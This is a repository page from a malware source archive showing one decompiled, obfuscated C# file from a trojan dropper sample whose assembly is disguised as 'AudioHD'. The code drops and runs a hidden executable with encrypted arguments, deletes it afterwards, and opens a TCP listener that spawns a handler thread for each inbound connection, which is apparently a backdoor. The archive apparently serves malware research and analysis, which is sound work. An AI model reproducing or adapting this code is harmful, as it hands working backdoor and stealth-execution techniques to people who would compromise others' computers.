ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-26 21:35:27 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
206bedd3f3
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0003.cs

98 lines
2.8 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using \u000F;
using System;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u000F
{
internal sealed class \u0003
{
[NonSerialized]
internal static \u0002 \u0001;
private static int \u0001;
private static string \u0001;
private static \u000E.\u0008 \u0001;
public static void \u000F()
{
try
{
\u0003.\u0001 = new Random().Next(1000, 9999);
if (!\u0003.\u000F())
return;
TcpListener tcpListener = new TcpListener(\u0003.\u0001);
tcpListener.Start();
\u0003.\u0001.\u000F(\u0003.\u0001);
while (true)
new Thread(new ThreadStart(new \u0007(tcpListener.AcceptTcpClient()).\u000F)).Start();
}
catch (Exception ex)
{
\u0003.\u0001.\u0010(ex.ToString());
}
}
private static bool \u000F()
{
try
{
string str = \u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
if (str.Contains(\u0003.\u0001(8096)))
{
\u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
if (str.Contains(\u0003.\u0001(8096)))
{
System.IO.File.Delete(\u0003.\u0001(8113));
return true;
}
System.IO.File.Delete(\u0003.\u0001(8113));
return false;
}
System.IO.File.Delete(\u0003.\u0001(8113));
return false;
}
catch
{
System.IO.File.Delete(\u0003.\u0001(8113));
return false;
}
}
public static string \u000F() => Dns.GetHostByName(Dns.GetHostName()).AddressList[0].ToString();
public static string \u000F([In] string obj0)
{
Process process = new Process();
process.StartInfo = new ProcessStartInfo()
{
WindowStyle = ProcessWindowStyle.Hidden,
FileName = \u0003.\u0001(8113),
Arguments = obj0,
RedirectStandardOutput = true,
UseShellExecute = false,
CreateNoWindow = true
};
process.Start();
return process.StandardOutput.ReadToEnd();
}
static \u0003()
{
\u0003.\u000F();
\u0003.\u0001 = \u0003.\u000F();
\u0003.\u0001 = new \u000E.\u0008();
}
}
}
Reference in New Issue Copy Permalink